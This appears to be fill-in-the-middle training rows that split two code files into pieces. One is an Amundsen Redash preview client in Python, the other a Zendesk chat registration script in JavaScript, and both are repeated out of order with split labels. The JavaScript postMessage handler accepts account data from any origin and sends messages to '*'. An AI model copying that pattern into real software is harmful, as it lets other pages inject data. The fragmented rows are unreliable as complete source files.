query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id)
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass |
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
| random_line_split |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class RedashApiResponse(Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method.
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
|
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id)
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass
| """
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached | identifier_body |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function isValid() {
return !elements.passwordContainer.is('.error') &&
input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
}
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) | else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
});
| {
nextAction();
} | conditional_block |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function isValid() |
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) {
nextAction();
} else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
});
| {
return !elements.passwordContainer.is('.error') &&
input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
} | identifier_body |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function isValid() {
return !elements.passwordContainer.is('.error') && |
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) {
nextAction();
} else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
